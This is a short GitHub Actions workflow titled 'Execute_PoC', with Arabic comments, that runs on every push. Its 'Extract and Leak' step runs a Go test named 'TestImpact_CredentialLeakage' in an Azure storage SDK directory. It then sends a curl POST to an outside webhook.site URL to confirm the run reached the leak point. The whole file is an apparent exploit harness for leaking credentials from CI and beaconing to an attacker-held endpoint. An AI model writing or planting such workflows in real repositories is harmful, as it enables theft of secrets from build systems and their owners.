name: Execute_PoC
on: [push]
jobs:
  run-exploit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Setup Go
        uses: actions/setup-go@v4
        with:
          go-version: '1.21'
      - name: Extract and Leak
        working-directory: ./sdk/storage/azblob
        run: |
          # 1. إصلاح نسخة الموديول
          sed -i 's/go 1.25.0/go 1.21/' go.mod
          
          # 2. تشغيل التست وجعل المخرجات تظهر في الـ Console
          # سنقوم بطباعة رسالة مميزة لنعرف أن الكود وصل لنقطة التسريب
          go test -v -run TestImpact_CredentialLeakage > output.txt 2>&1 || true
          
          # 3. إرسال إشارة للـ Webhook بأن التست انتهى (للتأكد من الاتصال)
          curl -X POST -d "Action_Completed" https://webhook.site/72d5ef0b-edde-4e82-b103-d71004e44835
          
          # 4. عرض المخرجات للتأكد من وجود خطأ أم لا
          cat output.txt
